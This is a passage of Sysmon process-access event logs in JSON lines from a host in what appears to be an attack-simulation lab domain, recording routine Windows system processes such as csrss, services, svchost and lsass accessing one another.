06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":844,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010C5EF0000}\r\nTargetProcessId: 1568\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010C5EF0000}","TargetProcessId":"1568","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":845,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010C5EF0000}\r\nTargetProcessId: 1568\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010C5EF0000}","TargetProcessId":"1568","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":846,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 944\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"944","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":847,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 944\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010C5EF0000}\r\nTargetProcessId: 1568\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"944","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010C5EF0000}","TargetProcessId":"1568","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":848,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":849,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":850,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":851,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":852,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 